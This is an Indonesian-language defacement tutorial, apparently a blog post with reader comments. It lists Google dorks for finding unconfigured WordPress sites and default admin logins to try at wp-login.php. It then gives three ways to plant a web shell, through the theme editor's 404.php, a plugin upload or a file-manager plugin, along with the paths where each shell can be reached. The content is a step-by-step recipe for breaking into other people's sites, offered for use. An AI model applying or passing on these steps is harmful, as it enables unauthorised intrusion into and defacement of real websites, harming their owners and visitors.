Cara Deface Poc Wp Default U/P
Bahan-Bahan:
#Dork:
- intitle:"My Blog - My Wordpress Blog" site:.
- intitle:"Hello World " intext:2020
inurl:/wp/
- intitle:"Wordpress" site:.br
- intitle:"My Blog - My Wordpress Blog" site:.pl
#Exploit: /wp-login.php
user: admin
pass: admin
Atau
user: admin
pass: pass
1.) Pertama Dorking Dulu Seperti Biasa
2.) Masukan Exploitnya Lalu Login Dengan User Dan Pass Default
3.) Kalo Vuln Otomatis Akan Masuk Ke Dashboard Admin
4.) Up Shell Donk
Nah Disni Saya Akan Kasih 3 Cara Up Shell nya:
Cara Pertama: - Aprireance ~>> Themes Editor ~>> terus kalian ubah source code 404.php
Cara manggilnya :
- https://www.namaweb.com/wp-content/themes/nama themekalian/404.php
Cara Kedua:
- Plugins ~>> Add New ~>> Upload Plugins ~>> Up shell kalian ber extensi .zip lalu klik install now
Kalo berhasil ada tulisan installed
Cara manggilnya :
- https://www.namaweb.com/wp-content/uploads/tahun/bulan/namashell.php
Cara Ketiga:
- Plugins ~>> Add new ~>> Search di Install plugins search "File Manager" lalu klik install dan active ~>> Setelah aktif akan muncul tulisannya WP file manager nah lalu klik dan up shell
sekian materi tutorial dari Tn.Error404
kurang lebihnya segitu
Fb di bajak
BalasHapusLive target ny ngab
BalasHapus